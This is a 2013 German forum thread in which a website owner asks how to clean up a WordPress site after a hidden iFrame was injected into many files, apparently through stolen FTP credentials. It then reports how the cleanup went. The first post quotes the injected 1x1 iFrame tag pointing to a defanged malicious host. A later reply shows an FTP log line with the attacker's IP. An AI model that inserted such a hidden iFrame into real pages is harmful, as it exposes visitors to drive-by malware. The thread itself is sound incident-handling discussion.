|
Plagegeister aller Art und deren Bekämpfung: Website infiziert - wie weiter vorgehen?Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
11.04.2013, 21:11 | #1 |
| Website infiziert - wie weiter vorgehen? Hallo zusammen, Google meldete mir per Mail, dass meine Website (hxxp:// feed . the1nter . net - ACHTUNG, NICHT KLICKEN! und noch eine weitere Subdomain) infiziert sei. Weitere Recherche zeigte mir 46 Dateien (hauptsächlich innerhalb von Wordpress, aber auch eine index.html), in die ein iFrame (<iframe src="hxxp:// protocolmindm . com/ img2/ count . htm" width="1" height="1" frameborder="0"> - AUCH HIER: NICHT KLICKEN!) injiziert wurde. Die Ursache dürfte Malware sein, die ich mir vor etwa einem Monat eingefangen hatte (trotz MSE und sorgsamem Surfen, besten Dank Microsoft - im Übrigen schon die 3. Infektion trotz MSE), ich vermute mal einen Keylogger, oder es hat mein FTP-Passwort bei FileZilla ausgespäht. Nach der Infektion änderte ich zwar alle Passwörter, nur das von der Website hatte ich wohl vergessen. Der Rechner ist natürlich neu aufgesetzt worden, die meiste Zeit bin ich sowieso mit Linux unterwegs. Weiteres Vorgehen: * Dateien vom Server nehmen, scannen (bringt das überhaupt etwas?) via Bash iFrames entfernen * Dateien wieder hochladen, Domain erneut mit Virustotal prüfen * Google informieren Genügt das? Oder kann sich da auch online ein aktives Programm eingenistet haben, und die iFrames sind nur die Auswirkung davon? Können meine Datenbanken auch befallen sein, ohne dass Virustotal es bemerkt? Vielen Dank schon einmal und viele Grüße Oli |
13.04.2013, 10:59 | #2 |
| Website infiziert - wie weiter vorgehen? Ich habe die komplette Seite vom Netz genommen, alle Passwörter geändert, Wordpress neu aufgesetzt (mit der alten Datenbank), und alle Seiten mit dem iFrame gereinigt. Nun sollte alles wieder passen.
__________________Zudem hat mein Hoster die Seite noch überprüft. Als nächstes ist dann das Google-Review dran, ich gebe Bescheid, wie's ausgeht. Zudem habe ich nun noch das WordPress-Plugin WordFence installiert, das mir dabei helfen sollte, dass so etwas nicht mehr passiert. Google hat die Seite wieder freigegeben, zumindest erscheint keine Malwarewarnung mehr, wenn man danach sucht. Schade, dass sich von den bislang 277 Besuchern dieses Threads niemand gemeldet hat, da hätte ich mir doch mehr erwartet. Wie auch immer - vielleicht hilft meine Lösung ja jemandem anders. Viele Grüße Oli |
13.04.2013, 22:35 | #3 |
| Website infiziert - wie weiter vorgehen? Wir hatten dasselbe Problem.
__________________hier auch: - Malware?! - h**p://www.joomlaportal.de/joomla-2-5-sicherheit/294895-malware.html - protocolmindm - Website infiziert - BoerseBZ - h**p://www.boerse.bz/netzwelt/webmaster/1435350-protocolmindm-website-infiziert.html EDIT: ^ Meine Links wurden von der Boardsoft rausgefiltert und stattdessen hier unten Google Adsense eingesetzt - Hallo gehts noch liebes Trojaner Board??? In unserem FTP Logfile hat man auch den Übeltäter gefunden: Fri Apr 12 01:23:45 2013 0 77.238.8.69 783 /www/htdocs/.../index.php b _ o r ftp-user ftp 0 * c Es wurden tatsächlich nur index.php Dateien manipuliert. Die einzige Frage die bleibt: Wie ist der Täter an die FTP Daten gekommen? - Malware? - FTP Sniffing? (wir verwenden erst seit heute SFTP) |
Themen zu Website infiziert - wie weiter vorgehen? |
achtung, dateien, eingefangen, erneut, gen, hallo zusammen, infektion, infiziert, keylogger, klicke, linux, mail, malware, neu, online, passwörter, programm, rechner, scan, scannen, server, surfen, trotz, virus, virustotal |